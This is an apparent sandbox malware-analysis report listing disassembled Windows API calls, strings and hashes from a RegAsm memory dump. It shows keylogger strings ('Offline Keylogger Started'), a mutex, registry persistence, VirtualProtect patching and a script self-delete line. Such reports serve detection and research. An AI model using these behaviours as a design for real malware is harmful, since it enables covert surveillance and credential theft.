                                                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1689 41c482-41c493 1690 41c495-41c498 1689->1690 1691 41c4ab-41c4b2 1689->1691 1692 41c4a1-41c4a9 1690->1692 1693 41c49a-41c49f 1690->1693 1694 41c4b3-41c4cc CreateFileW 1691->1694 1692->1694 1693->1694 1695 41c4d2-41c4d7 1694->1695 1696 41c4ce-41c4d0 1694->1696 1698 41c4f2-41c503 WriteFile 1695->1698 1699 41c4d9-41c4e7 SetFilePointer 1695->1699 1697 41c510-41c515 1696->1697 1701 41c505 1698->1701 1702 41c507-41c50e CloseHandle 1698->1702 1699->1698 1700 41c4e9-41c4f0 CloseHandle 1699->1700 1700->1696 1701->1702 1702->1697
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                  • String ID: xpF
                                                                                  • API String ID: 1852769593-354647465
                                                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                  APIs
                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                  • API String ID: 782494840-2070987746
                                                                                  • Opcode ID: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                  • Opcode Fuzzy Hash: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                    • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2099061454-0
                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                  • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                  • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                  • String ID: XQG
                                                                                  • API String ID: 1958988193-3606453820
                                                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                    • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                    • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2099061454-0
                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                  • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                  • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 2152742572-0
                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                  • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                  • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                  • _free.LIBCMT ref: 00448353
                                                                                  • _free.LIBCMT ref: 0044837A
                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountEventTick
                                                                                  • String ID: !D@$NG
                                                                                  • API String ID: 180926312-2721294649
                                                                                  • Opcode ID: d94aa07c736e1f7a8f1a37b64ee9e97400bd2344e2915174af18eaceb140e48c
                                                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                  • Opcode Fuzzy Hash: d94aa07c736e1f7a8f1a37b64ee9e97400bd2344e2915174af18eaceb140e48c
                                                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                  APIs
                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                  • String ID: Offline Keylogger Started
                                                                                  • API String ID: 465354869-4114347211
                                                                                  • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                  • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                  APIs
                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 1818849710-4028850238
                                                                                  • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                  • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3360349984-0
                                                                                  • Opcode ID: e60242df51168d91f5bbcbea9cc38a8aab7e65ddefa9dc6369296d832d9cc247
                                                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                  • Opcode Fuzzy Hash: e60242df51168d91f5bbcbea9cc38a8aab7e65ddefa9dc6369296d832d9cc247
                                                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 3919263394-0
                                                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                  APIs
                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateErrorLastMutex
                                                                                  • String ID: Rmc-UCDCW8
                                                                                  • API String ID: 1925916568-4211839959
                                                                                  • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                  • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                  APIs
                                                                                  • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                  • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EventObjectSingleWaitsend
                                                                                  • String ID:
                                                                                  • API String ID: 3963590051-0
                                                                                  • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                  • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                  • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                  • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3677997916-0
                                                                                  • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                  • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3677997916-0
                                                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                  • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                  • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3677997916-0
                                                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3677997916-0
